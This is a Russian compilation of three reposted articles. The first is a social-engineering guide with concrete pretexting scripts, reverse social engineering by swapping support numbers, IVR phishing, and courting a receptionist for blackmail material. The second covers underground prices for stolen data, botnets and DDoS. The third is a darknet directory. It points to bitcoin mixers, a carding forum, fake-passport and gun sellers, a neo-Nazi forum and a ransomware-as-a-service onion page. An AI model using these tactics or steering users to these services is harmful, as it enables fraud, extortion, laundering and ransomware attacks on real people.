На память приходит история из книги «Психология влияния»: психологи по телефону передавали медсёстрам в больницах соответствующие указания, которые могли нанести ущерб здоровью и даже жизни. Достаточно было представиться врачом и 95% медсестёр следовали указанию «руководителя».

Стоит учесть, что медперсонал знал последствия после манипуляции, но все равно следовали команде. Естественно, им не давали это выполнить, а возле палаты стаяли ассистенты. Исследуемые даже не попросили врача представиться. Причина, почему медсёстры так поступают, заключается в привычке следовать указаниям авторитетного лица.

Исходя из рассматриваемого примера можно сделать вывод, что за счёт социальной инженерии удалось поразить до 95% больниц.

Метод не устаревает.

Технологический прогресс неуклонно набирает обороты, это приводит к увеличению функциональности и мощности оборудования и софта. Чтобы была возможность отражать атаки или их проводить, нужно всегда быть максимально осведомлённым и следить за нововведениями. Немаловажным фактором является осмотр новых разработок в первых рядах. Самая важная составляющая защиты – качественно, детально уметь анализировать IT-background темы.

Путь хакера начинается по тем же шагам. Современность приводит к необходимости использования всего пары специалистов по узкой направленности для решения отдельных, но важных задач. Центральная цель всей работы заключается в проникновении внутрь защищённой зоны.

Для достижения поставленной цели с большой долей вероятности будет необходимо использование социальной инженерии. Чаще необходимость появляется в течении первых нескольких проектов. Наибольшая ценность специалиста по социнженерии на стадии подготовки и сбора данных. Сверх полученных знаний будет необходимо наложить технологии, они уже требуют углублённых навыков и знаний.

Если компания достаточно большая и обладает специальным отделом безопасности, стоит заглянуть туда и обнаружить нескольких разработчиков с циническим и параноидальным подходом к делу. Они совершенно не доверяют людям и считают этот аспект самым уязвимым. Учитывая количество ценных данных и наработок на ПК сотрудников, такой подход вполне полезен для компании, но полной защиты не гарантирует. Основная задача команды заключается в разделении прав доступа, создании инструкций поведения при критических ситуациях и разработке способов решения проблемы.

При наличии таких кадров в штате можно повысить иммунитет компании, но система все равно останется уязвимой за счёт других сотрудников.

Основной недостаток социнжиринга для разработчиков ПО – это невозможность создать патч или специальную функцию. Для злоумышленников социальная инженерия популярна за счёт длительно периода влияния. Скорее всего механика будет сохранять эффективность всё время, в отдельных условиях могут изменяться небольшие аспекты, но чаще достигается предположительный результат.

Основная модель соц.инженерии.

Очевидно, что все сотрудники имеют различные уровни компетентности в отдельных вопросах обеспечения безопасности, соответственно, им выдаётся должный уровень допуска. Обычные сотрудники не должны иметь доступа к информации, которая может нанести ущерб для компании. Даже если человек окажется засланным агентом или просто обманутым, он не сможет получить особенно важную информацию – этот протокол безопасности используется во всех больших фирмах.

Все звенья цепи и персонал с различными уровнями доступа имеют линейную связь, то есть сотрудник может передать проблему на следующую ступень, там уже разбираются, уполномочены ли они решать ситуацию. Если ответ нет, вопрос передаётся дальше и т.д. Сотрудники могут по этой цепи передать всю необходимую информацию непосредственно к управляющему.

Уязвимость системы заключается в возможности представиться одним из людей высшего уровня. Здесь несколько развитий ситуации:

• Можно поставить себя авторитетом, аналогично рассматриваемому примеру с врачами.
• Задать несколько вопросов, которые на первый взгляд невинны и не причинят вреда, но это станет часть мозаики.
• Получить контакт более высокопоставленного сотрудника, так как распространено понятие взаимной помощи в пределах одной команды.

Редко можно увидеть вопросы из разряда паранойи, когда сотрудник будет выяснять данные звонившего человека и строго следовать регламенту. Можно найти лазейки даже в строгой структуре, ведь эмоции – это неотъемлемая часть человеческой натуры

Проявляете скептицизм? Правильно, но для наглядности можно рассмотреть пример, при котором злоумышленник набирает девушку из call-центра каждую неделю по 2-3 раза на протяжении месяца. Он ничего особого не просит, а представляется сотрудником. Позитивные и активные разговоры позволяют уточнить любые незначительные мелочи. Пользу приносит просьба о небольшой помощи, которая придаёт доверие просившему.

В рассматриваемом примере нет необходимости чётко представляться, вместо этого присутствует факт частого общения. Может потребоваться 10, 20, 30 или 50 раз, до момента вхождения в норму жизни. Девушка будет думать, что звонивший в курсе структуры и мелочей работы компании, так как он звонит постоянно. В следующий раз злоумышленник просит о большей помощи, теперь оператору нужно передать потенциально важные и опасные данные. По необходимости придётся предоставить обоснование и опасность при отказе. Практически любой сотрудник пойдёт ему на встречу.

Вероятно, поселится мысль, что подобному обману подвержены исключительно низко компетентные сотрудники. Это не так, в качестве аргумента можно привести вступление из книги «Искусство обмана». Здесь рассказывается история о том, что Митник представился ведущим разработчиком проекта, он попросил системного администратора передать доступ со всеми привилегиями к системе. Специалист точно осознавал потенциальный ущерб для работы, но доверился авторитету и побоялся отказать.

Обратная социальная инженерия.

Принципиальных отличий в атаках социальной инженерии не наблюдается, модель приблизительно одинаковая. В случае с обратной методикой также удаётся получить информацию, которая предназначается только пользователю. Отличием является указание нужных данных самим пользователем.

Методика разыгрывается в 3 хода и показывает высокую эффективность:

• Нужно подстроить трудность или неприятность пользователю.
• Создать контакт с человеком.
• Проводится атака.

Для наглядности можно представить, что вы находитесь в охраняемой зоне, ваши полномочия – уборка территории. На стене с номером техподдержки нужно указать собственный контакт вместо правильного номера. Теперь нужно устроить небольшую проблему. Всего через 1 сутки вам поступит звонок от расстроенного пользователя, он готов передать буквально всю информацию, так как ожидает компетентность сотрудника и подразумевает, что всё это специалист и так знает. Проблемы авторизации можно исключить, так как пользователь сам идентифицирует вас как он хочет, остаётся только подыграть.

Одним из самых опасных вариаций обмана является IVR-фишинг. Нужно устроить небольшую атаку на пользователя и прислать письмо с номером центра поддержки. После непродолжительной беседы автоответчик просит указать данные от карты.

Ещё частные случаи.

Фишинг может применяться на любых ресурсах, которые часто используются целью. Поместить на указанный внешний ресурс троянский конь или дезинформацию. Случаи с инфицированием машин компаний стали учащаться в последнее время.

Более муторный способ – передать интересный диск одному из сотрудников. Высока вероятность, что накопитель будет запущен, а софт оттуда запустят. Часто используются соцсети цели для сбора элементов мозаики и общения с отдельными сотрудниками. Выбор уязвимостей действительно огромный.

Резюме.

Посредством социальной инженерии можно собрать данные, а затем их использовать для атаки. К примеру, «Привет! Я потерял/забыл номер Игоря из 4-го отдела, пожалуйста, напомни мне его». Можно получить даже конфиденциальную информацию: «Хорошо, спасибо. Кстати, у меня стойкое впечатление, что клиент подозрительный, смотри как он осматривал расположение камер в отделении. Подскажи номер карты, которой он пользовался только что».

Социальная инженерия позволяет обеспечить доступ к защищенной части системы: «Так, проговаривайте, что вы вводите сейчас. Подождите, давайте по буквам. Два-игрик-доллар-пэ-эс-эн большая…». Продвинутые «хакеры»могут получать конфиденциальные данные. Порой удаётся получить доступ к защищенному серверу, который отключен от сети.

Недавно проводился хакерский турнир, в рамках которого была интересная задача. Перед вами девушка, она всегда стоит на рецепшене, но вы попросили об услуге или устроили деверсию, чтобы она отлучилась. Есть всего 30 секунд, что за это время можно успеть сделать? Установить вирус или программу в систему? Ответ неверный, будет недостаточно либо времени, либо прав. Завладеть документами с рабочего стола или попытаться переадресовать письма себе? Идея рабочая, но вы раскроете свою личность. Даже просто занять её место – это опасное решение, так как высока вероятность скрытой камеры в офисе.

Лучшими решения являются ответы из сферы социального взаимодействия. Заменить стикер с номером техподдержки, после милого общения пригласить на свидание и т.д. За встречу с девушкой вне рабочей обстановки атакующего точно не осудят, но за время встречи можно получить массу полезных данных про иерархию и потенциальные уязвимости сотрудников, вплоть до данных для шантажа.

Защита компании – это основная задача отдела безопасности, но сотрудники не в силах исключить риски социальной инженерии. Чтобы обеспечить лучшую защиту стоит ознакомиться с книгой «Искусство обмана», некоторые диалоги точно зацепят вас. Полезна информация из книги «Секреты супер хакера», особенно в главе про социнженерию. Более углублённо можно почитать в «Психология влияния».

При отсутствии большого и продвинутого отдела безопасности стоит ознакомить руководителя компании с информацией, а затем провести собственный тест. С большой долей вероятности удастся узнать многое о доверчивости и склонностях человека говорить «Да».

Турнир Cyber Readiness Challenge и социальная инженерия.

Кроме технических методов предотвращения социальных угроз (таких как введение общей платформы для обмена сообщениями внутри компании, обязательной аутентификации новых контактов и так далее) необходимо объяснять пользователям, что именно происходит при таких атаках. Правда, это бесполезно, если не совмещать теорию с практикой, а именно — время от времени действовать самому как злоумышленник и пробовать проникнуть в свои же системы. После пары «учебных тревог» и разборов сотрудники, по крайней мере, будут думать, не проверяют ли их при звонках.

Разумеется, для противостояния угрозе нужно «залезть в голову» атакующему вас злоумышленнику и научиться думать как он. В рамках оффлайного турнира Cyber Readiness Challenge, изначально создававшегося как симулятор для обучения специалистов по безопасности, мы не могли пройти мимо этого класса угроз.

Если вы разбираетесь в серверном и системном администрировании, инфраструктуре сетей и других технических вещах, но не учитываете такой прекрасный человеческий фактор, турнир даст вам пару интересных идей.

Источник - https://zen.yandex.ru/media/zhiviprosto/chto-oznachaet-socialnaia-injeneriia-osnovy-manipuliacii-5be5d95c5d9d8200a985d882

Полезно будет знать всем, поскольку каждый пользователь сети является потенциальным источником дохода для хакера. Кстати, мнение, что хакеры воруют деньги с ваших карточек и банковских счетов несколько ошибочно. Этим занимаются другие люди и зовут их кардеры.
Кардеры как правило сами не взламывают ничьи компьютеры, в большинстве случаев у них не хватает для этого ни времени ни квалификации и необходимую информацию они просто покупают. А вот покупают они ее как раз у хакеров. Что же именно продают кардерам хакеры? Для успешного вбива - покупки с украденной карточки или перевода денег на свой счет, кардеру требуется как минимум вся информация с карточки и адрес проживания жертвы. Эти данные хакеры чаще всего воруют у онлайн магазинов где сохраняются эти данные. Так же источником этих данных служат логи личного компьютера, в которых содержатся и номера карт и куки и вообще много того, что позволит кардеру подделаться под ваш компьютер в глазах (антифрод) системы распознавания мошенников вашего банка. Логи взломанного компьютера стоят от 10 до 200 рублей. Очень могут пригодиться и данные социальных карт, страховки, даже чеки за коммунальные платежи, поскольку это все помогает пройти проверку при совершении платежа.
Типичные источники дохода хакера, этот торговля взломанными аккаунтами социальных сетей, емэйл аккаунты, удаленный доступ к компьютерам, серверам, личные данные, сканы документов. Последний пункт как раз самый неприятный, поскольку сканы позволяют идентифицировать электронные кошельки через которые обнальщики выводят грязные деньги, так же с помощью сканов мошенники получают на почте украденные кардерами в онлайн магазинах вещи, регистрируются в каршерингах, бронируют отели и так далее. Что бы украсть скан паспорта не обязательно взламывать ваш компьютер, такие данные можно найти например на сервере каршеринга где вы зарегистрированы или на компьютере какой-нибудь гостиницы, где вы останавливались пару лет назад или даже в компьютере блондинки из кадрового отдела. Там и поживы будет больше. Учитывая тот факт, что цена на комплект сканов - паспорт (главная страница, прописка), фото с паспортом, снилс около 200-600 рублей, вы можете понять насколько легко эти данные добываются, раз так дешево стоят. Удаленный доступ к компьютеру обойдется 2$ - 10$, покупают такие услуги спамеры, кардеры, арбитражники и еще много кто, кому нужно соблюсти анонимность за чужой счет. Наиболее неприятные последствия могут быть в случае, если доступ к компьютеру купил другой хакер, для взлома какого-нибудь значимого объекта. Полиция в первую очередь придет к владельцу компьютера, а процесс доказательства своей невиновности - штука нервная и хлопотливая. Аккаунты социальных сетей так же очень востребованы спамерами и теми кто работает с серой и черной рекламой. Все эти товары хакеры добывают как вы догадываетесь не поштучно, ведь уровень беспечности подавляющего большинства интернет пользователей позволяет это делать массово. Отсюда и низкие цены. Те же самые любители халявы на торрентах ежедневно пополняют ряды зараженных компьютеров какого-нибудь ботнета, который сдается в аренду за 500$ - 3000$ в месяц.
Конечно же хакеры работают и по заказам, но адресный взлом, это не такая простая вещь, здесь требуются более обширные познания в технике взлома, в отличие от массового взлома, где вы ищите жертв подбирая их по принципу ломается - не ломается, тут нужно подбирать инструменты к одному объекту взлома. Так же необходимо обладать еще и навыками социальной инженерии, то-есть нужно уметь мотивировать жертву совершить действия, которые приведут к взлому требуемой цели да и работа как с клиентом так и с жертвой требует тщательного соблюдения анонимности. В сфере заказного взлома наибольший процент мошенников выдающих себя за хакеров. Не спешите заказывать за 2000 рублей взлом ВК вашего обидчика, это самый распространенных способов заработка на доверчивых гражданах (мамонтах). Найти хакера способного выполнить заказ не так просто, но возможно. Цена взлома всегда индивидуальна, от 2000 рублей до бесконечности. Такие вещи как взлом сайта конкурента или DDOS атака вполне рядовая услуга. DDOS стоит около 300$ в сутки. С появлением криптовалют у хакеров появился новый источник дохода, это воровство монет с кошельков простых граждан, данные о номере кошелька и пароле хакеры получают самыми разнообразными способами. Самый простой и распространенный, это создание поддельного сайта биржи. Так же до недавнего времени был очень популярно встраивание онлайн майнера в код какого-нибудь сайта с большой посещаемостью. Таким образом посетители сайта начинали майнить криптовалюту для злоумышленника в то время как в их браузере был открыт их любимый сайт.
Высшая элита мира хакеров, это группировки, которые имеют свое имя и проворачивают какие-нибудь сумасшедшие аферы взламывая системы безопасности банков, правительств и так далее. О них мы все наслышаны, это то, что периодически попадает в новости. Но наряду с такими группировками существуют еще и так называемые белые хакеры. Это хакеры, которые не скрываются от государственных служб, а действуют открыто, зарабатывают тем, что помогают находить крупным компаниям уязвимости в их продуктах и получают за это порой очень серьезные денежные вознаграждения. У них есть ежегодные конференции, они открыты всему миру их имена известны. Белыми зачастую их можно называть лишь условно, поскольку например за неизвестную уязвимость в IOS или Windows представители ЦРУ готовы заплатить цену в несколько раз превышающую ту, что официально готовы заплатить в Apple или Microsoft. Спецслужбы активно покупают трояны и прочее хакерское ПО, чем собственно хакеры и пользуются. Насколько это соответствует понятию белый хакер остается большим вопросом.

Источник - https://zen.yandex.ru/media/id/5be560a15d9d8200a985cee5/na-chem-zarabatyvaiut-hakery-5c869a93e5991500b4917c27

Даркнет - часть интернета которая отличается более высокой анонимностью и приватностью, к сайтам данного сегмента сети невозможно подключиться через обычный браузер. В даркнете сосредоточены сайты предоставляющие незаконные услуги, а также сообщества занимающиеся нелегальной деятельностью.

Форумы

· Runion — старейший из существующих на данный момент русскоязычных форумов (работает с 2012 года). Имеется небольшой раздел для торговли, но сам сам проект позиционируется как некоммерческий ресурс. Участниками написано огромное количество статей на самую разную тематику — от информационной безопасности до медицины и права.

· Astaroth — Итальянский даркнет форум.

• НС форум — Форум национал-социалистов и расистов. Без субкультуры, фетиша и мишуры. XMPP-сервер на том же домене.

Финансы

· Blockchain — зеркало blockchain.info в onion-сети, крупнейшего ресурса для отслеживания транзакций ВТС в режиме реального времени. По совместительству надёжный онлайн bitcoin-кошелек. Для пользования кошельком нужен JavaScript.

· ChipMixer — миксер bitcoin, можно забрать приватные ключи вместо битков для дополнительной анонимности

· Bitcoin Fog — миксер для "мытья" биткоинов, наиболее старый и проверенный. Позволяет перетасовать ваши ВТС, для того, чтобы нельзя было отследить, кто именно вам их отправил. Последнее время появилось много отзывов о кидалове. Не требует JavaScript.

· Bitcoin Blender — ещё один миксер. Площадка была на "доске позора" на сайте reddit.com, сейчас пиарится известным зарубежным ресурсом. Пользоваться на свой страх и риск. Не требует JS.

· MixerMoney — автоматический bitcoin-миксер / анонимайзер с русскоязычной поддержкой.

· Konvert — bitcoin-обменник. Для пополнения доступны QIWI, VISA и кэш-ин. При покупке биткоинов за QIWI требует подтверждение номера телефона (вам позвонит робот), чем может поставить под удар вашу безопасность. Требует JS.

· Askoin — отслеживание bitcoin-обменников. Более 300 обменников РФ и Украины. Для работы нужен JS.

· BitMix — еще один биткоин миксер.

· 24xbtc — обменник криптовалют в сети даркнет, работающий 24 часа в сутки 7 дней в неделю, с онлайн службой поддержки.

Общение

· Facebook — зеркало популярной социальной сети в .onion

· Onelon — анонимная социальная сеть, позиционируется как самая безопасная и удобная. Чем-то напоминает имиджборд.

· BlackBook — социальная сеть, посвященная темной стороне современного интернета. В сети постоянно существует высокая активность, поэтому Вы всегда сможете найти интересный контент. Удобный интерфейс можно с полной уверенностью назвать еще одним преимуществом BlackBook.

· Зеркало kiset.org — анонимный чат со случайным собеседником.

· Kali Linux - Russian Community — русскоязычное сообщество Kali Linux в Tor.

· Debian — зеркало официального сайта операционной системы для красноглазиков.

· CFUD.biz — зеркало популярной площадки. Хакинг, безопасность, кардинг, обнал etc.

· Скрытые ответы на русском, на английском

· Подлодка — спутниковое телевидение, оборудование для приема и декодирование. Скрытые сети и безопасность.

· Keybase чат — Чат Kyebase. Напоминает Slack.

· Под соцсети diaspora в Tor — Полностью в tor под распределенной соцсети diaspora.

· Зеркало пода JoinDiaspora — Зеркало крупнейшего пода распределенной соцсети diaspora в сети tor.

· WeRiseUp — социальная сеть от коллектива RiseUp, специализированная для работы общественных активистов; onion-зеркало.

· DaMaGeLaB.IN — Безопасность, хакинг, кодинг, малваря, исследования, реверс, всем этим занимаются представители сообщества ДэмэджЛаб.

Почта

· Mail2tor — анонимный e-mail сервис. Есть возможность использовать его на вашем собственном почтовом клиенте.

· ScryptMail — почтовый сервис с множеством ништяков. Есть встроенная система PGP, возможность создавать псевдонимы. Может слать письма как в TOR, так и в клирнет. Из минусов - переполнен багами.

· ProtonMail — достаточно известный и безопасный почтовый сервис. Сервера расположены в Швейцарии. Для работы требуется JavaScript.

· TorBox — email сервис с возможностью отправлять письма только внутри сети TOR, без возможности соединения с клирнетом.

· RiseUp Email Service — почтовый сервис от команды Rise Up.

· Daniel Winzen — хороший e-mail сервис в зоне .onion, плюс xmpp-сервер, плюс каталог онион-сайтиков.

· Cockmail — Электронная почта, XMPP и VPS.

· Bitmessage Mail Gateway — сервис позволяет законнектить Bitmessage с электронной почтой, можно писать на емайлы или на битмесседж.

· O3mail — анонимный e-mail сервис. Для работы нужен JavaScript.

· TorGuerrillaMail — одноразовая почта. Зеркало сайта guerrillamail.com

· VFEmail — почтовый сервис, зеркало vfemail.net

· SecMail — Почта с регистрацией через Tor.

· Sigiant — почтовый ящик с регистрацией в onion, который можно использовать для работы с клирнетом.

Jabber / XMPP-серверы

· Calyx Institute public XMPP server - сервер с принудительным OTR

· securejabber.me — надёжный и безопасный jabber-сервер, находящийся в Германии.

· jabber.cryptoparty.is — ещё один безопасный сервер, находится в Румынии.

· The Wall Street Jabber — сервер с защитой от спама (сообщения поступают только от авторизованных).

· XMPP-spam — cпам-сервис в jabber.

· TorXMPP — локальный onion jabber. Связь доступна только внутри сервера RuTor. TLS, шифрование паролей пользователей, 100% доступность и др. Проект создан при поддержке форума RuTor.

· f5sco6gxvt7twuthpufz3x4pa44v77oi2ycdara44dgajbrgisrolnqd.onion:5222 - NextGeneration Onions hidden service v3. Локальный jabber-сервер. Тестовый.

Имиджборды

· BeamStat — Статистика Bitmessage, список, кратковременный архив чанов (анонимных немодерируемых форумов) Bitmessage, отправка сообщений в чаны Bitmessage.

· Neboard — зеркало neboard.me

· Архив Хидденчана — архив сайта hiddenchan.i2p, медленно работает.

· Tumbach — Зеркало tumba.ch Работает без JS.

Хостинг картинок и файлов

· Pic2Tor — анонимный хостинг картинок. Разрешенные форматы: JPG, GIF, PNG; max: 20 MB; 5000x5000 px; Картинки удаляются через 60 дней, если их никто не просматривает.

· Sectum — хостинг для картинок, фоток и тд, есть возможность создавать альбомы для зареганых пользователей. Относительно стабилен.

· Just upload stuff — прикольный файловый хостинг в TORе, автоудаление файла после его скачки кем-либо, есть возможность удалять метаданные, ограничение 300 мб на файл.

· Felixxx — некий французский image hosting размером до 5 мб, в нагрузку еще и pastebin.

· Sluggers — картинко-хостинг до 5 мб, без ограничения по времени хранения.

· Matrix — хостинг картинок в торе, макс. 5 мб, хранение до 30 дней.

· GoDaddy — хостинг сервис с удобной админкой и покупка доменов .onion

· Onion — Недорогой и секурный луковый хостинг, можно сразу купить onion домен.

· DarkHost — Хостинг для тех,кто решил перейти на темную сторону. Есть разные тарифы и кастомные домены onion.

· FileDrop — Файлдроппер. Уверяет, что всё энкриптит и не ведёт логи.

Pastebin / Одноразовые записки

· CrypTor — одноразовые записки. Имеется возможность прикрепления файлов до 3 мб. Не работает без JavaScript. Сервис от Rutor.

· Enot — сервис одноразовых записок от UNITY, уничтожаются после просмотра. Минималистичный дизайн. Без JavaScript.

· ZeroBin — одноразовые записки. Для работы требуется JS.

· Pasta — аналог pastebin со словесными идентификаторами.

· Whispernote — Одноразовые записки с шифрованием, есть возможность прицепить картинки, ставить пароль и количество вскрытий записки.

· CRYPTEX NOTE — сервис одноразовых записок, уничтожаются после просмотра. Без JavaScript.

· Stronghold Paste — Одноразовые записки. Не требует яваскрипт. Есть возможность шифрования, комментирования записок и т.д.

Другие TOR сайты

· Runion Wiki — Runion Wiki

· Oneirun — Яндекс даркнета

· Caronte, Not Evil, Candle, Abyss, Torgle, Sinbad, Ahmia — поисковики по сети TOR.

· DuckDuckGo — зеркало duckduckgo.com. Заявляют, что не следит за пользователями, ищет по открытому интернету, но не ищет по скрытым сетям. Достаточно распиаренный, в том числе и на ресурсах по борьбе со слежкой в интернетах. Выдача Яндекса, плюс исключенные результаты.

· Torch — поисковик по скрытой сети, можно попробовать что-то найти.

· Cases.legal — обзор судебной практики, решения судов, в том числе по России, Украине, США и др.

· Security in-a-box — комплекс руководств по цифровой безопасности, бложек на английском.

· Tor Metrics — статистика всего TORа, посещение по странам, траффик, количество onion-сервисов.

· Munin — статистика TOR-сети.

· Библиотека Траума — большое количество книг для скачивания (fb2, html, txt), без регистрации и смс.

· eXeL@B — Портал исследования программ

· RuTor - русский торрент-трекер — Зеркало в .onion торрент-трекера RuTor.org, не требует регистрации

· The Pirate Bay - торрент-трекер — Зеркало известного торрент-трекера, не требует регистрации

· Sci-Hub — пиратский ресурс, который открыл массовый доступ к десяткам миллионов научных статей.

· ParaZite — олдскульный сайтик, большая коллекция анархичных файлов и подземных ссылок.

· Флибуста — крупнейшая библиотека бесплатных книг

· ABFCGIUASAOS — гайд по установке и использованию анонимной безопасной ОС. Полностью на английском.

· RetroShare — свеженькие сборки ретрошары внутри тора

· SecureDrop — отправка файлов и записочек журналистам The New Yorker, ну мало ли

· Tor Project Onion — список зеркал сайтов Tor Project в скрытой сети на онион доменах

· QubesOS — зеркало проекта QubesOS, ссылки на загрузку образов системы все равно клирнетовские

· Whonix — зеркало проекта Whonix, ссылки на загрузку образов системы все равно клирнетовские

· Секретна скринька хунти — некие сливы мейлов анти-украинских деятелей и их помощников, что-то про военные отношения между Украиной и Россией.

· Eye On Ass — рейтинг популярности .onion сайтов, статистика по хитам (не путать с уникальными посетителями), стата немного крейзи и возможно в чем-то расходится с реальностью, используйте как есть без каких-либо нареканий.

· Fresh Onions — Сайтец собирает свеженькие луковичные линки, так же проверяет их на доступность.

· Рутрекер — Крупнейший русскоязычный битторрент трекер

· fake id — Фальшивые документы. Паспорта, права и т.д. западных стран.

· abiko — Самый адекватный на текущий момент поисковик

· Euro Guns — продажа огнестрелов

· Deep Web Radio — Радио даркнета. Учитывая, что напрягов с музыкой в «чистом вебе» особо нет, существование подпольной радиостанции обосновать непросто. Но тем не менее она существует. Можешь слушать один из пяти «эфиров» и тащиться от того, что делаешь это через Tor.

· DeepDotWeb — Крупнейший международный ресурс с новостями DarkNet

· Словесный богатырь — онлайн-библиотека с большой базой книг, в нескольких форматах, отсутствие рекламы добавляет библиотеке жирный плюс.

· РосПравосудие — проект созданный в 2012 году для исследования общедоступной судебной практики. В базе есть десятки тысяч уголовных, административных и гражданских дел.

· DocFarm — изготовление и продажа документов на все случаи жизни. Быстрая доставка по СНГ, большое количество отзывов о работе на различных ресурсах. Работает с 2013 года.

· Продажа паспортов — Паспорта на оригинальных бланках, гражданство Украины.

· http://fhoqzxgahij5dl2u.onion/ - вот тут жутко. Главная страница локера Satan. Распространяется бесплатно, в качестве платы - 30% от полученных локером средств. На ваш страх и риск.

Источник - https://zen.yandex.ru/media/id/5acdbab2dd24841275b80aa5/interesnye-saity-darkneta-5aee10c400b3dd64a60f2001